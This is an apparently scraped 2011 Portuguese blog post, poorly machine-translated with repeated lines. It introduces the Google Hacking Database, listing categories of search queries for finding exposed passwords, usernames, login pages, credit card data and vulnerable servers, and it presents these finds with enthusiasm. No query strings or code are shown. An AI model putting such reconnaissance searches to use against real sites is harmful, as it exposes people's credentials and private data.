url: | Verifica se o domínio ou o endereço web listado está no índice do Bing. | Para verificar se o domínio Microsoft está no índice, digite url:microsoft.com. |
![]() | |||
---|---|---|---|
Não inclua espaços após a vírgula nessas palavras-chave. |
Fonte:goo.gl/nHgkD
quinta-feira, 20 de janeiro de 2011
Famoso Banco de dados do Google Hacking (GHDB)! ou "googledorks"
Aqui é disponibilizado um grande conteúdo de caráter Hacking google
O famoso banco de dados GoogleDorcks não fica de fora, logo abaixo seguem uma seria de links onde as strings de pesquisa são expostas.
Banco de dados do Google Hacking (GHDB)!
Nós os chamamos de 'googledorks': inepto ou pessoas tolas como revelado pelo Google. Tudo o que você chamar esses tolos, você encontrou o centro do Universo Google Hacking! Pare por nossos para ver onde a magia acontece!
Avisos e Vulnerabilidades (215 cadastros)
Estas buscas localizar servidores vulneráveis. Estas pesquisas são, muitas vezes gerada a partir de vários postos de segurança consultivo e, em muitos casos, são produto ou específico da versão.
Arquivos contendo informações suculento (230 cadastros)
Não usernames ou senhas, mas nenhum material interessante a menos.
Não usernames ou senhas, mas nenhum material interessante a menos.
Os arquivos contendo senhas (135 cadastros)
SENHAS, para o AMOR DE DEUS! O Google descobriu que senhas!
SENHAS, para o AMOR DE DEUS! O Google descobriu que senhas!
Arquivos contendo nomes de usuário (15 entradas)
Estes arquivos contém os nomes de usuários, senhas, mas não ... Ainda assim, o Google encontrar nomes em um site ..
Estes arquivos contém os nomes de usuários, senhas, mas não ... Ainda assim, o Google encontrar nomes em um site ..
Pontos de apoio (21 cadastros)
Exemplos de consultas que podem ajudar um hacker ganhar uma posição segura em um servidor web
Exemplos de consultas que podem ajudar um hacker ganhar uma posição segura em um servidor web
Páginas contendo portais de login (232 cadastros)
Estas são páginas de login para diversos serviços. Considerá-los pela porta da frente das funções mais sensíveis de um site.
Estas são páginas de login para diversos serviços. Considerá-los pela porta da frente das funções mais sensíveis de um site.
Páginas de rede que contém dados ou vulnerabilidade (59 cadastros)
Estas páginas contêm coisas como logs de firewall, honeypot logs, informações de rede, logs IDS ... todos os tipos de coisas divertidas!
Estas páginas contêm coisas como logs de firewall, honeypot logs, informações de rede, logs IDS ... todos os tipos de coisas divertidas!
Diretórios sensíveis (61 cadastros)
coleta do Google de web sites compartilhando diretórios sensíveis. Os arquivos contidos aqui vai variar de sesitive a super-secreta!
coleta do Google de web sites compartilhando diretórios sensíveis. Os arquivos contidos aqui vai variar de sesitive a super-secreta!
Compras on-line sensível Info (9 cadastros)
Exemplos de consultas que podem revelar informações de compras online, como dados de clientes, fornecedores, pedidos, números de cartão de crédito, informações de cartão de crédito, etc
Exemplos de consultas que podem revelar informações de compras online, como dados de clientes, fornecedores, pedidos, números de cartão de crédito, informações de cartão de crédito, etc
Vários Online Devices (201 cadastros)
Esta categoria contém coisas como impressoras, câmeras de vídeo, e toda sorte de coisas legais que encontrei na web com o Google.
Esta categoria contém coisas como impressoras, câmeras de vídeo, e toda sorte de coisas legais que encontrei na web com o Google.
Vulnerável Arquivos (57 cadastros)
Centenas de arquivos vulneráveis que o Google pode encontrar em sites ...
Centenas de arquivos vulneráveis que o Google pode encontrar em sites ...
Servidores Vulneráveis (48 cadastros)
Essas pesquisas revelam servidores com vulnerabilidades específicas. Estes são encontrados em uma maneira diferente do que as pesquisas encontradas na seção "Arquivos de Vulnerável" seção.
Essas pesquisas revelam servidores com vulnerabilidades específicas. Estes são encontrados em uma maneira diferente do que as pesquisas encontradas na seção "Arquivos de Vulnerável" seção.
Web Server Detecção (72 cadastros)
Essas ligações demonstram a capacidade incrível do Google para seu perfil servidores web ..
Essas ligações demonstram a capacidade incrível do Google para seu perfil servidores web ..
Assinar:
Postagens (Atom)